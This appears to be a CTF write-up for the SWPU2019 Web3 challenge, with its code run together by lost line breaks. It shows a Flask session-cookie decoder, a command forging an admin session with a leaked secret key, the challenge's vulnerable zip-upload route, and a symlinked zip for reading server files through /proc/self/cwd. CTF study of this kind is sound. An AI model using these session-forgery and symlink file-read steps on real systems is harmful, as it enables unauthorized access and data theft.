[SWPU2019]Web3-解题步骤详解

import sysimport zlibfrom base64 import b64decodefrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption(payload):    payload, sig = payload.rsplit(b'.', 1)    payload, timestamp = payload.rsplit(b'.', 1)    decompress = False    if payload.startswith(b'.'):        payload = payload[1:]        decompress = True    try:        payload = base64_decode(payload)    except Exception as e:        raise Exception('Could not base64 decode the payload because of '                         'an exception')    if decompress:        try:            payload = zlib.decompress(payload)        except Exception as e:            raise Exception('Could not zlib decompress the payload before '                             'decoding the payload')    return session_json_serializer.loads(payload)if __name__ == '__main__':    print(decryption(sys.argv[1].encode()))

python3 flask_session_cookie_manager3.py encode -s 'keyqqqwwweee!@#$%^&*' -t "{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}"

@app.route('/upload',methods=['GET','POST'])def upload():    if session['id'] != b'1':        return render_template_string(temp)    if request.method=='POST':        m = hashlib.md5()        name = session['password']        name = name+'qweqweqwe'        name = name.encode(encoding='utf-8')        m.update(name)        md5_one= m.hexdigest()        n = hashlib.md5()        ip = request.remote_addr        ip = ip.encode(encoding='utf-8')        n.update(ip)        md5_ip = n.hexdigest()        f=request.files['file']        basepath=os.path.dirname(os.path.realpath(__file__))        path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"        path_base = basepath+'/upload/'+md5_ip+'/'        filename = f.filename        pathname = path+filename        if "zip" != filename.split('.')[-1]:            return 'zip only allowed'        if not os.path.exists(path_base):            try:                os.makedirs(path_base)            except Exception as e:                return 'error'        if not os.path.exists(path):            try:                os.makedirs(path)            except Exception as e:                return 'error'        if not os.path.exists(pathname):            try:                f.save(pathname)            except Exception as e:                return 'error'        try:            cmd = "unzip -n -d "+path+" "+ pathname            if cmd.find('|') != -1 or cmd.find(';') != -1:waf()                return 'error'            os.system(cmd)        except Exception as e:            return 'error'        unzip_file = zipfile.ZipFile(pathname,'r')        unzip_filename = unzip_file.namelist()[0]        if session['is_login'] != True:            return 'not login'        try:            if unzip_filename.find('/') != -1:                shutil.rmtree(path_base)                os.mkdir(path_base)                return 'error'            image = open(path+unzip_filename, "rb").read()            resp = make_response(image)            resp.headers['Content-Type'] = 'image/png'            return resp        except Exception as e:            shutil.rmtree(path_base)            os.mkdir(path_base)            return 'error'    return render_template('upload.html')@app.route('/showflag')def showflag():    if True == False:        image = open(os.path.join('./flag/flag.jpg'), "rb").read()        resp = make_response(image)        resp.headers['Content-Type'] = 'image/png'        return resp    else:        return "can't give you"

ln -s /proc/self/cwd/flag/flag.jpg forever404zip -ry forever404.zip forever404